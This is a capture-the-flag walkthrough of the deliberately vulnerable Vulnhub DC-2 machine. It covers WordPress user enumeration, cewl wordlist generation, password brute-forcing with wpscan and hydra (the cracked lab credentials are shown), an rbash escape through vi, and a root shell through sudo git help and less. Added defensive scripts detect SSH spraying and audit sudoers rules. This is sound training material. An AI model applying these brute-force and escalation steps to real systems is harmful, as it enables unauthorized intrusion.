Walkthrough: Vulnhub - DC: 2

· by Christoph Stoettner · Read in about 8 min · (1690 words)

Download and Information
Original Description

Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

As with the original DC-1, it’s designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag.

And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts, is the final flag.

For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.

I haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

Technical Information

DC-2 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.

While I haven’t tested it within a VMware environment, it should also work.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

Please note that you will need to set the hosts file on your pentesting device to something like:

/etc/hosts
192.168.0.145 dc-2  (1)
(1) Obviously, replace 192.168.0.145 with the actual IP address of DC-2.

It will make life a whole lot simpler (and a certain CMS may not work without it).

If you’re not sure how to do this, instructions are here.

Recon

Find IP

nmap -sn 10.128.1.150-200 (1)
(1) Changed DHCP range

Create /etc/hosts entry

/etc/hosts
10.128.1.155 dc-2

Find open ports

root@kali:~/vulnhub/dc2# nmap -p- -A 10.128.1.155
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 10:29 EST
Nmap scan report for dc-2 (10.128.1.155)
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site    (1)
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:9D:5E:27 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.11 ms dc-2 (10.128.1.155)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds
(1) WordPress this time

Wordpress

wpscan

root@kali:~/vulnhub/dc2# wpscan --url http://dc-2
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.5
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://dc-2/
[+] Started: Sun Jan  5 10:31:52 2020

Interesting Finding(s):

[+] http://dc-2/
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).     (1)
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |
 | [!] 21 vulnerabilities identified:                                           (2)
 |
...
(1) WordPress version
(2) 21 known vulnerabilities

Enumerate Users

root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 --rua --enumerate u

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <===========================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Ok, so we found three users:

  • admin

  • jerry

  • tom

Opening the page gave us Flag 1, so the next goal is to log in to WordPress.

Figure 1. WordPress page

We got the hint to be cewl! cewl is a tool that generates a wordlist from the text of web pages.

Generate wordlist

root@kali:~/vulnhub/dc2# cewl -w passwords http://dc-2

Find matching passwords

root@kali:~/vulnhub/dc2# wpscan --url http://dc-2 -P passwords -U 'admin,tom,jerry'

[i] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

So log in with one of the two users and check Pages → Flag 2 to find the next flag.

SSH

Check whether one of the WordPress passwords works on the SSH port (7744, see the nmap output).

root@kali:~/vulnhub/dc2# cat users
admin
tom
jerry

root@kali:~/vulnhub/dc2# cat success_pw
parturient
adipiscing

root@kali:~/vulnhub/dc2# hydra -L users -P success_pw -u 10.128.1.155 -s 7744 ssh

[DATA] attacking ssh://10.128.1.155:7744/
[7744][ssh] host: 10.128.1.155   login: tom   password: parturient      (1)

Now try ssh as user tom:

root@kali:~/vulnhub/dc2# man ssh
root@kali:~/vulnhub/dc2# ssh tom@10.128.1.155 -p 7744
The authenticity of host '[10.128.1.155]:7744 ([10.128.1.155]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '[10.128.1.155]:7744' (ECDSA) to the list of known hosts.
tom@10.128.1.155's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt  usr

tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ ls usr/bin
less  ls  scp  vi

tom@DC-2:~$ less flag3.txt

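The SSH password spray above, seen from the DC-2 side: an added example (not from the original post) that flags one source failing against several accounts in sshd's auth.log and reports whether that source later logged in. Log lines, the attacker IP and the thresholds are constructed.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: spot the hydra-style
# password spray from the SSH section in sshd's auth.log. The log lines,
# attacker IP and thresholds are constructed for this demo.
# Constructed sample of what sshd on DC-2 writes to /var/log/auth.log while
# hydra cycles the wpscan user list (admin, tom, jerry) against port 7744.
SAMPLE_AUTH_LOG='Jan  5 10:45:01 DC-2 sshd[2031]: Failed password for invalid user admin from 10.128.1.10 port 51230 ssh2
Jan  5 10:45:01 DC-2 sshd[2033]: Failed password for invalid user admin from 10.128.1.10 port 51231 ssh2
Jan  5 10:45:02 DC-2 sshd[2035]: Accepted password for tom from 10.128.1.10 port 51232 ssh2
Jan  5 10:45:02 DC-2 sshd[2037]: Failed password for tom from 10.128.1.10 port 51233 ssh2
Jan  5 10:45:03 DC-2 sshd[2039]: Failed password for jerry from 10.128.1.10 port 51234 ssh2
Jan  5 10:45:03 DC-2 sshd[2041]: Failed password for jerry from 10.128.1.10 port 51235 ssh2
Jan  5 10:50:10 DC-2 sshd[2100]: Failed password for tom from 10.128.1.20 port 40000 ssh2'

# spray_sources [min_fails] [min_users]   (auth.log on stdin)
# Prints "ip failures distinct_users" for every source that failed against at
# least min_users different accounts and at least min_fails times in total.
spray_sources() {
    awk -v mf="${1:-3}" -v mu="${2:-2}" '
        /sshd\[[0-9]+\]: Failed password for / {
            # "invalid user" adds tokens, so locate the user relative to "from"
            for (i = 1; i <= NF; i++)
                if ($i == "from") { user = $(i - 1); ip = $(i + 1) }
            fails[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        }
        END {
            for (ip in fails)
                if (fails[ip] >= mf && users[ip] >= mu)
                    print ip, fails[ip], users[ip]
        }' | sort
}

# spray_then_success [min_fails] [min_users]   (auth.log on stdin)
# Prints "ip user" when a spraying source later got an "Accepted password"
# line: one of the guessed credentials worked, which is the alert that matters.
spray_then_success() {
    log=$(cat)
    for ip in $(printf '%s\n' "$log" | spray_sources "$@" | awk '{ print $1 }'); do
        printf '%s\n' "$log" | awk -v ip="$ip" '
            /sshd\[[0-9]+\]: Accepted password for / {
                for (i = 1; i <= NF; i++)
                    if ($i == "from" && $(i + 1) == ip) print ip, $(i - 1)
            }'
    done
}

printf '%s\n' "$SAMPLE_AUTH_LOG" | spray_sources          # 10.128.1.10 5 3
printf '%s\n' "$SAMPLE_AUTH_LOG" | spray_then_success     # 10.128.1.10 tom
```

Against a live box, feed the real file instead: `spray_then_success < /var/log/auth.log`.
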
Escape rbash

We have a very limited shell (rbash), and ~/usr/bin only contains less, ls, scp and vi, but with vi or less we can read flag3.txt.

Run external command in vi

vi can run external commands, so I tried running :set shell=/bin/bash and :! /bin/bash from within vi. I got a better shell.

SHELL and PATH
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash

There is no need to su into the jerry account to read flag4, which is world readable in his home directory, but you need jerry to get to the last flag.

Jerry wasn’t allowed to log in via ssh, but it works on the console:

tom@DC-2:/$ su jerry
Password:             (1)
jerry@DC-2:/$ sudo -l

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
(1) Use the password found with wpscan here

I had some headaches figuring out how to get git to open a root shell.

Root Shell with git

git help add, for example, opens the man page of git add. The default program used to display the man page here is less, and less can, like vi before, run external commands. So ! /bin/bash within less starts a new bash. Since jerry is allowed to run git with sudo, that’s the trick to get the final flag.

jerry@DC-2:/$ sudo git help add
root@DC-2:/# cd
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat /root/final-flag.txt

So we got the Final Flag.

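An added example, not part of this walkthrough, that audits a sudoers file for the rule class jerry had: a command allowed as root that can start a shell from its pager or editor (git help, less, vi, and man, which git help calls), granted without sudo's NOEXEC tag. The sudoers text is constructed.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: audit a sudoers file
# for the rule class jerry had, a command allowed as root that can start a
# shell from its pager or editor (git help -> man -> less -> "!"). The sudoers
# text is constructed; the command list is this page's binaries plus man.

SAMPLE_SUDOERS='Defaults        env_reset
root    ALL=(ALL:ALL) ALL
jerry   ALL=(root) NOPASSWD: /usr/bin/git
tom     ALL=(root) NOPASSWD: /usr/bin/less /var/log/syslog
backup  ALL=(root) NOEXEC: /usr/bin/git
ops     ALL=(root) /usr/bin/systemctl restart apache2, /usr/bin/vi /etc/motd'

# Commands that can run arbitrary programs from inside their pager or editor.
SHELL_CAPABLE='/usr/bin/git /usr/bin/less /usr/bin/vi /usr/bin/man'

# audit_sudoers   (sudoers on stdin)
# Prints "user command" for each rule that grants a shell-capable command
# without sudo's NOEXEC tag. NOEXEC stops the command from exec'ing another
# program (less, man, a shell) and so closes this escape for dynamically
# linked binaries; fixed arguments such as a file name do not help, since
# "!" inside less or vi still works.
audit_sudoers() {
    awk -v list="$SHELL_CAPABLE" '
        BEGIN { n = split(list, cmds, " "); for (i = 1; i <= n; i++) bad[cmds[i]] = 1 }
        /^[ \t]*(#|Defaults)/ || NF == 0 { next }
        {
            # Rule layout: user host=(runas) [TAG: ...] cmd [args][, cmd ...]
            line = $0
            sub(/^[^=]*=/, "", line)             # drop "user host="
            sub(/^\([^)]*\)[ \t]*/, "", line)    # drop "(runas)"
            noexec = (line ~ /NOEXEC:/)
            gsub(/[A-Z]+:[ \t]*/, "", line)      # drop NOPASSWD:, NOEXEC:, ...
            m = split(line, specs, ",")
            for (i = 1; i <= m; i++) {
                split(specs[i], w, " ")
                if ((w[1] in bad) && !noexec) print $1, w[1]
            }
        }'
}

printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
```

On a real host run it as `sudo cat /etc/sudoers /etc/sudoers.d/* | audit_sudoers`; the NOEXEC check is per line, so a tag that only covers one of several comma-separated commands is reported conservatively.
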
Flags

Flag 1

Found directly as a WordPress post:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

Flag 2

Log in as tom or jerry and check Pages → Flag 2

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

Flag 3

/home/tom/flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

Flag 4

/home/jerry/flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

Final Flag

/root/final-flag.txt
 __    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/

Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Final thoughts

This machine was real fun! I learned some new tools and ways to start shells. Never ran a shell through an editor like vi or less before.

cewl was completely new for me and I already think about how to use it more often.

Thanks to @DCAU7! Looking forward to the other machines in the DC series.